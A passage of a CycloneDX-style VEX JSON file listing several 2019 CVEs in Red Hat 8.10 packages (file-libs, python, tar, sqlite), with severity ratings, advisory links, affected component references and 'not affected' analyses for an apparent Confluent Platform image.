          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable.\nFor python:"
      }
    },
    {
      "id": "CVE-2019-8906",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.6,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "do_core_note in readelf.c in libmagic.a in file 5.35 has an out-of-bounds read because memcpy is misused.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-8906"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00027.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00053.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-8906"
        },
        {
          "url": "https://bugs.astron.com/view.php?id=64"
        },
        {
          "url": "https://github.com/file/file/commit/2858eaf99f6cc5aae129bcbf1e24ad160240185f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8906"
        },
        {
          "url": "https://support.apple.com/kb/HT209599"
        },
        {
          "url": "https://support.apple.com/kb/HT209600"
        },
        {
          "url": "https://support.apple.com/kb/HT209601"
        },
        {
          "url": "https://support.apple.com/kb/HT209602"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3911-1"
        },
        {
          "url": "https://usn.ubuntu.com/3911-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-8906"
        }
      ],
      "published": "2019-02-18T17:29:01+00:00",
      "updated": "2026-06-17T02:42:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.33-27.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable.\nFor python:"
      }
    },
    {
      "id": "CVE-2019-9674",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Lib/zipfile.py in Python through 3.7.2 allows remote attackers to cause a denial of service (resource consumption) via a ZIP bomb.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9674"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00003.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00041.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9674"
        },
        {
          "url": "https://bugs.python.org/issue36260"
        },
        {
          "url": "https://bugs.python.org/issue36462"
        },
        {
          "url": "https://github.com/python/cpython/blob/master/Lib/zipfile.py"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9674"
        },
        {
          "url": "https://python-security.readthedocs.io/security.html#archives-and-zip-bomb"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20200221-0003/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4428-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4754-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6891-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7212-1"
        },
        {
          "url": "https://usn.ubuntu.com/4428-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9674"
        },
        {
          "url": "https://www.python.org/news/security/"
        }
      ],
      "published": "2020-02-04T15:15:11+00:00",
      "updated": "2026-06-17T02:44:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2019-9923",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9923"
        },
        {
          "url": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html"
        },
        {
          "url": "http://savannah.gnu.org/bugs/?55369"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9923"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241"
        },
        {
          "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4692-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9923"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-9936",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "In SQLite 3.27.2, running fts5 prefix queries inside a transaction could trigger a heap-based buffer over-read in fts5HashEntrySort in sqlite3.c, which may lead to an information leak. This is related to ext/fts5/fts5_hash.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9936"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00026.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107562"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9936"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00037.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXD2GYJVTDGEQPUNMMMC5TB7MQXOBBMO/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N66U5PY5UJU4XBFZJH7QNKIDNAVIB4OP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9936"
        },
        {
          "url": "https://security.gentoo.org/glsa/201908-09"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190416-0005/"
        },
        {
          "url": "https://sqlite.org/src/info/b3fa58dd7403dbd4"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4019-1"
        },
        {
          "url": "https://usn.ubuntu.com/4019-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9936"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114382.html"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114394.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
        },
        {
          "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
